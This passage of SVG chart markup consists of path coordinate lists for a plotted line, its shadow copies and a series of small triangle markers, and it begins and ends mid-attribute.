253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.71428571428572 L 177.76797385620918 253.71428571428572 L 179.74361259655382 253.71428571428572 L 181.71925133689842 253.71428571428572 L 183.69489007724306 253.71428571428572 L 185.67052881758767 253.71428571428572 L 187.6461675579323 253.71428571428572 L 189.6218062982769 253.71428571428572 L 191.59744503862154 253.71428571428572 L 193.57308377896615 253.71428571428572 L 195.5487225193108 253.71428571428572 L 197.52436125965542 253.71428571428572 L 199.50000000000003 253.71428571428572 L 201.47563874034466 253.71428571428572 L 203.45127748068927 253.71428571428572 L 205.4269162210339 253.71428571428572 L 207.4025549613785 253.71428571428572 L 209.37819370172315 253.71428571428572 L 211.35383244206778 253.71428571428572 L 213.3294711824124 253.71428571428572 L 215.30510992275703 253.71428571428572 L 217.28074866310163 253.71428571428572 L 219.25638740344627 253.71428571428572 L 221.23202614379088 252.77909485714287 L 223.2076648841355 252.77909485714287 L 225.18330362448012 251.843904 L 227.15894236482475 251.38112914285713 L 229.1345811051694 249.09135771428572 L 231.110219845514 249.09135771428572 L 233.08585858585863 249.09135771428572 L 235.06149732620324 249.09135771428572 L 237.03713606654787 249.09135771428572 L 239.01277480689248 249.09135771428572 L 240.98841354723712 248.8401523809523 L 242.96405228758175 248.8401523809523 L 244.93969102792636 248.8401523809523 L 246.915329768271 248.50255451428555 L 248.8909685086156 248.19251565714268 L 250.86660724896024 246.34623679999982 L 252.84224598930484 244.44591679999982 L 254.81788472964945 243.25853394285696 L 256.79352346999406 240.3517293714284 L 258.7691622103387 237.44492479999982 L 260.7448009506833 234.04642194285697 L 262.72043969102793 232.60075794285697 L 264.69607843137254 231.12223794285697 L 266.6717171717172 228.9391392761875 L 268.6473559120618 226.61080327618748 L 270.6229946524064 223.79558956190175 L 272.598633392751 223.79558956190175 L 274.5742721330957 223.79558956190175 L 276.5499108734403 223.25954201904463 L 278.5255496137849 222.7119251047589 L 280.50118835412957 221.62826064761606 L 282.4768270944742 220.56773493333034 L 284.4524658348188 219.4917833904732 L 286.4281045751634 219.1543433904732 L 288.40374331550805 217.6966025904732 L 290.37938205585266 217.15284213333035 L 292.35502079619727 215.6989577904732 L 294.33065953654193 215.14941264761606 L 296.30629827688654 214.43226384761607 L 298.28193701723114 212.21094453333035 L 300.25757575757575 209.94106430475892 L 302.2332144979204 208.78364003047318 L 304.208853238265 208.52479733333067 L 306.1844919786096 208.3280638933307 L 308.1601307189543 207.5211002361878 L 310.1357694592989 206.71413657904498 L 312.1114081996435 206.10070617904495 L 314.0870469399881 205.51934526475924 L 316.0626856803328 204.8001160076164 L 318.0383244206774 204.12812835047356 L 320.013963161022 203.62100423618784 L 321.98960190136665 203.28645657904497 L 323.96524064171126 203.22465177904496 L 325.94087938205587 203.22465177904496 L 327.9165181224005 203.06460880761642 L 329.89215686274514 202.75609223618784 L 331.86779560308975 202.35598480761638 L 333.84343434343435 202.32579280761638 L 335.81907308377896 202.2708078476164 L 337.7947118241236 202.08043079618767 L 339.77035056446823 201.94783971047337 L 341.74598930481284 201.84401982475907 L 343.7216280451575 201.75719315809263 L 345.6972667855021 201.62124233142566 L 347.6729055258467 201.4586368457114 L 349.6485442661913 201.3706825599973 L 351.624183006536 201.2325413333307 L 353.5998217468806 201.18226869333068 L 355.5754604872252 200.70378046475923 L 357.55109922756986 200.70378046475923 L 359.52673796791447 200.70378046475923 L 361.5023767082591 200.70378046475923 L 363.4780154486037 200.70378046475923 L 365.45365418894835 200.70378046475923 L 367.42929292929296 200.70378046475923 L 369.40493166963756 200.0530033219021 L 371.3805704099822 199.58540789333068 L 373.35620915032683 198.7562696076164 L 375.33184789067144 197.34160949333068 L 377.30748663101605 196.16872387047354 L 379.2831253713607 195.06095655618782 L 381.2587641117053 194.14027815618783 L 383.2344028520499 193.44363454475928 L 385.2100415923946 193.44363454475928 L 387.1856803327392 193.44363454475928 L 389.1613190730838 192.3544097980925 L 391.1369578134284 190.75367506285443 L 393.1125965537731 190.161404434283 L 395.0882352941177 189.5237679999973" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.71428571428572 L 177.76797385620918 253.71428571428572 L 179.74361259655382 253.71428571428572 L 181.71925133689842 253.71428571428572 L 183.69489007724306 253.71428571428572 L 185.67052881758767 253.71428571428572 L 187.6461675579323 253.71428571428572 L 189.6218062982769 253.71428571428572 L 191.59744503862154 253.71428571428572 L 193.57308377896615 253.71428571428572 L 195.5487225193108 253.71428571428572 L 197.52436125965542 253.71428571428572 L 199.50000000000003 253.71428571428572 L 201.47563874034466 253.71428571428572 L 203.45127748068927 253.71428571428572 L 205.4269162210339 253.71428571428572 L 207.4025549613785 253.71428571428572 L 209.37819370172315 253.71428571428572 L 211.35383244206778 253.71428571428572 L 213.3294711824124 253.71428571428572 L 215.30510992275703 253.71428571428572 L 217.28074866310163 253.71428571428572 L 219.25638740344627 253.71428571428572 L 221.23202614379088 252.77909485714287 L 223.2076648841355 252.77909485714287 L 225.18330362448012 251.843904 L 227.15894236482475 251.38112914285713 L 229.1345811051694 249.09135771428572 L 231.110219845514 249.09135771428572 L 233.08585858585863 249.09135771428572 L 235.06149732620324 249.09135771428572 L 237.03713606654787 249.09135771428572 L 239.01277480689248 249.09135771428572 L 240.98841354723712 248.8401523809523 L 242.96405228758175 248.8401523809523 L 244.93969102792636 248.8401523809523 L 246.915329768271 248.50255451428555 L 248.8909685086156 248.19251565714268 L 250.86660724896024 246.34623679999982 L 252.84224598930484 244.44591679999982 L 254.81788472964945 243.25853394285696 L 256.79352346999406 240.3517293714284 L 258.7691622103387 237.44492479999982 L 260.7448009506833 234.04642194285697 L 262.72043969102793 232.60075794285697 L 264.69607843137254 231.12223794285697 L 266.6717171717172 228.9391392761875 L 268.6473559120618 226.61080327618748 L 270.6229946524064 223.79558956190175 L 272.598633392751 223.79558956190175 L 274.5742721330957 223.79558956190175 L 276.5499108734403 223.25954201904463 L 278.5255496137849 222.7119251047589 L 280.50118835412957 221.62826064761606 L 282.4768270944742 220.56773493333034 L 284.4524658348188 219.4917833904732 L 286.4281045751634 219.1543433904732 L 288.40374331550805 217.6966025904732 L 290.37938205585266 217.15284213333035 L 292.35502079619727 215.6989577904732 L 294.33065953654193 215.14941264761606 L 296.30629827688654 214.43226384761607 L 298.28193701723114 212.21094453333035 L 300.25757575757575 209.94106430475892 L 302.2332144979204 208.78364003047318 L 304.208853238265 208.52479733333067 L 306.1844919786096 208.3280638933307 L 308.1601307189543 207.5211002361878 L 310.1357694592989 206.71413657904498 L 312.1114081996435 206.10070617904495 L 314.0870469399881 205.51934526475924 L 316.0626856803328 204.8001160076164 L 318.0383244206774 204.12812835047356 L 320.013963161022 203.62100423618784 L 321.98960190136665 203.28645657904497 L 323.96524064171126 203.22465177904496 L 325.94087938205587 203.22465177904496 L 327.9165181224005 203.06460880761642 L 329.89215686274514 202.75609223618784 L 331.86779560308975 202.35598480761638 L 333.84343434343435 202.32579280761638 L 335.81907308377896 202.2708078476164 L 337.7947118241236 202.08043079618767 L 339.77035056446823 201.94783971047337 L 341.74598930481284 201.84401982475907 L 343.7216280451575 201.75719315809263 L 345.6972667855021 201.62124233142566 L 347.6729055258467 201.4586368457114 L 349.6485442661913 201.3706825599973 L 351.624183006536 201.2325413333307 L 353.5998217468806 201.18226869333068 L 355.5754604872252 200.70378046475923 L 357.55109922756986 200.70378046475923 L 359.52673796791447 200.70378046475923 L 361.5023767082591 200.70378046475923 L 363.4780154486037 200.70378046475923 L 365.45365418894835 200.70378046475923 L 367.42929292929296 200.70378046475923 L 369.40493166963756 200.0530033219021 L 371.3805704099822 199.58540789333068 L 373.35620915032683 198.7562696076164 L 375.33184789067144 197.34160949333068 L 377.30748663101605 196.16872387047354 L 379.2831253713607 195.06095655618782 L 381.2587641117053 194.14027815618783 L 383.2344028520499 193.44363454475928 L 385.2100415923946 193.44363454475928 L 387.1856803327392 193.44363454475928 L 389.1613190730838 192.3544097980925 L 391.1369578134284 190.75367506285443 L 393.1125965537731 190.161404434283 L 395.0882352941177 189.5237679999973" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.71428571428572 L 177.76797385620918 253.71428571428572 L 179.74361259655382 253.71428571428572 L 181.71925133689842 253.71428571428572 L 183.69489007724306 253.71428571428572 L 185.67052881758767 253.71428571428572 L 187.6461675579323 253.71428571428572 L 189.6218062982769 253.71428571428572 L 191.59744503862154 253.71428571428572 L 193.57308377896615 253.71428571428572 L 195.5487225193108 253.71428571428572 L 197.52436125965542 253.71428571428572 L 199.50000000000003 253.71428571428572 L 201.47563874034466 253.71428571428572 L 203.45127748068927 253.71428571428572 L 205.4269162210339 253.71428571428572 L 207.4025549613785 253.71428571428572 L 209.37819370172315 253.71428571428572 L 211.35383244206778 253.71428571428572 L 213.3294711824124 253.71428571428572 L 215.30510992275703 253.71428571428572 L 217.28074866310163 253.71428571428572 L 219.25638740344627 253.71428571428572 L 221.23202614379088 252.77909485714287 L 223.2076648841355 252.77909485714287 L 225.18330362448012 251.843904 L 227.15894236482475 251.38112914285713 L 229.1345811051694 249.09135771428572 L 231.110219845514 249.09135771428572 L 233.08585858585863 249.09135771428572 L 235.06149732620324 249.09135771428572 L 237.03713606654787 249.09135771428572 L 239.01277480689248 249.09135771428572 L 240.98841354723712 248.8401523809523 L 242.96405228758175 248.8401523809523 L 244.93969102792636 248.8401523809523 L 246.915329768271 248.50255451428555 L 248.8909685086156 248.19251565714268 L 250.86660724896024 246.34623679999982 L 252.84224598930484 244.44591679999982 L 254.81788472964945 243.25853394285696 L 256.79352346999406 240.3517293714284 L 258.7691622103387 237.44492479999982 L 260.7448009506833 234.04642194285697 L 262.72043969102793 232.60075794285697 L 264.69607843137254 231.12223794285697 L 266.6717171717172 228.9391392761875 L 268.6473559120618 226.61080327618748 L 270.6229946524064 223.79558956190175 L 272.598633392751 223.79558956190175 L 274.5742721330957 223.79558956190175 L 276.5499108734403 223.25954201904463 L 278.5255496137849 222.7119251047589 L 280.50118835412957 221.62826064761606 L 282.4768270944742 220.56773493333034 L 284.4524658348188 219.4917833904732 L 286.4281045751634 219.1543433904732 L 288.40374331550805 217.6966025904732 L 290.37938205585266 217.15284213333035 L 292.35502079619727 215.6989577904732 L 294.33065953654193 215.14941264761606 L 296.30629827688654 214.43226384761607 L 298.28193701723114 212.21094453333035 L 300.25757575757575 209.94106430475892 L 302.2332144979204 208.78364003047318 L 304.208853238265 208.52479733333067 L 306.1844919786096 208.3280638933307 L 308.1601307189543 207.5211002361878 L 310.1357694592989 206.71413657904498 L 312.1114081996435 206.10070617904495 L 314.0870469399881 205.51934526475924 L 316.0626856803328 204.8001160076164 L 318.0383244206774 204.12812835047356 L 320.013963161022 203.62100423618784 L 321.98960190136665 203.28645657904497 L 323.96524064171126 203.22465177904496 L 325.94087938205587 203.22465177904496 L 327.9165181224005 203.06460880761642 L 329.89215686274514 202.75609223618784 L 331.86779560308975 202.35598480761638 L 333.84343434343435 202.32579280761638 L 335.81907308377896 202.2708078476164 L 337.7947118241236 202.08043079618767 L 339.77035056446823 201.94783971047337 L 341.74598930481284 201.84401982475907 L 343.7216280451575 201.75719315809263 L 345.6972667855021 201.62124233142566 L 347.6729055258467 201.4586368457114 L 349.6485442661913 201.3706825599973 L 351.624183006536 201.2325413333307 L 353.5998217468806 201.18226869333068 L 355.5754604872252 200.70378046475923 L 357.55109922756986 200.70378046475923 L 359.52673796791447 200.70378046475923 L 361.5023767082591 200.70378046475923 L 363.4780154486037 200.70378046475923 L 365.45365418894835 200.70378046475923 L 367.42929292929296 200.70378046475923 L 369.40493166963756 200.0530033219021 L 371.3805704099822 199.58540789333068 L 373.35620915032683 198.7562696076164 L 375.33184789067144 197.34160949333068 L 377.30748663101605 196.16872387047354 L 379.2831253713607 195.06095655618782 L 381.2587641117053 194.14027815618783 L 383.2344028520499 193.44363454475928 L 385.2100415923946 193.44363454475928 L 387.1856803327392 193.44363454475928 L 389.1613190730838 192.3544097980925 L 391.1369578134284 190.75367506285443 L 393.1125965537731 190.161404434283 L 395.0882352941177 189.5237679999973" fill="none" stroke="#aaeeee" stroke-width="2"></path><path d="M 395 194.82 L 391 186.82 399 186.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 393 195.32 L 389 187.32 397 187.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 391 196.32 L 387 188.32 395 188.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 389 197.82 L 385 189.82 393 189.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 387 198.82 L 383 190.82 391 190.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 385 198.82 L 381 190.82 389 190.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 383 198.82 L 379 190.82 387 190.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 381.5 199.32 L 377.5 191.32 385.5 191.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 379.5 200.32 L 375.5 192.32 383.5 192.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 377.5 201.32 L 373.5 193.32 381.5 193.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 375.5 202.82 L 371.5 194.82 379.5 194.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 373.5 204.32 L 369.5 196.32 377.5 196.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 371.5 204.82 L 367.5 196.82 375.5 196.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 369.5 205.32 L 365.5 197.32 373.5 197.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 367.5 205.82 L 363.5 197.82 371.5 197.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 365.5 205.82 L 361.5 197.82 369.5 197.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 363.5 205.82 L 359.5 197.82 367.5 197.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 361.5 205.82 L 357.5 197.82 365.5 197.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 359.5 205.82 L 355.5 197.82 363.5 197.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 357.5 205.82 L 353.5 197.82 361.5 197.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 355.5 205.82 L 351.5 197.82 359.5 197.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 353.5 206.32 L 349.5 198.32 357.5 198.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 351.5 206.32 L 347.5 198.32 355.5 198.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 349.5 206.82 L 345.5 198.82 353.5 198.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 347.5 206.82 L 343.5 198.82 351.5 198.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 345.5 206.82 L 341.5 198.82 349.5 198.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 343.5 207.32 L 339.5 199.32 347.5 199.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 341.5 207.32 L 337.5 199.32 345.5 199.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 340 207.32 L 336 199.32 344 199.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 338 207.32 L 334 199.32 342 199.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 336 207.82 L 332 199.82 340 199.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 334 207.82 L 330 199.82 338 199.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 332 207.82 L 328 199.82 336 199.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 330 208.32 L 326 200.32 334 200.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 328 208.32 L 324 200.32 332 200.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 326 208.32 L 322 200.32 330 200.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 324 208.32 L 320 200.32 328 200.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 322 208.82 L 318 200.82 326 200.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 320 208.82 L 316 200.82 324 200.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 318 209.32 L 314 201.32 322 201.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 316 210.32 L 312 202.32 320 202.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 314 210.82 L 310 202.82 318 202.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 312 211.32 L 308 203.32 316 203.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 310 211.82 L 306 203.82 314 203.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 308 212.82 L 304 204.82 312 204.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 306 213.82 L 302 205.82 310 205.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 304 213.82 L 300 205.82 308 205.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 302 214.32 L 298 206.32 306 206.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 300.5 215.32 L 296.5 207.32 304.5 207.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 298.5 217.32 L 294.5 209.32 302.5 209.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 296.5 219.82 L 292.5 211.82 300.5 211.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 294.5 220.32 L 290.5 212.32 298.5 212.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 292.5 220.82 L 288.5 212.82 296.5 212.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 290.5 222.32 L 286.5 214.32 294.5 214.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 288.5 222.82 L 284.5 214.82 292.5 214.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 286.5 224.32 L 282.5 216.32 290.5 216.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 284.5 224.82 L 280.5 216.82 288.5 216.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 282.5 225.82 L 278.5 217.82 286.5 217.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 280.5 226.82 L 276.5 218.82 284.5 218.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 278.5 227.82 L 274.5 219.82 282.5 219.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 276.5 228.82 L 272.5 220.82 280.5 220.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 274.5 229.32 L 270.5 221.32 278.5 221.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 272.5 229.32 L 268.5 221.32 276.5 221.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 270.5 229.32 L 266.5 221.32 274.5 221.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 268.5 231.82 L 264.5 223.82 272.5 223.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 266.5 234.32 L 262.5 226.32 270.5 226.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 264.5 236.32 L 260.5 228.32 268.5 228.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 262.5 237.82 L 258.5 229.82 266.5 229.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 260.5 239.32 L 256.5 231.32 264.5 231.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 259 242.82 L 255 234.82 263 234.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 257 245.82 L 253 237.82 261 237.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 255 248.82 L 251 240.82 259 240.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 253 249.82 L 249 241.82 257 241.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 251 251.82 L 247 243.82 255 243.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 249 253.32 L 245 245.32 253 245.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 247 253.82 L 243 245.82 251 245.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 245 254.32 L 241 246.32 249 246.32 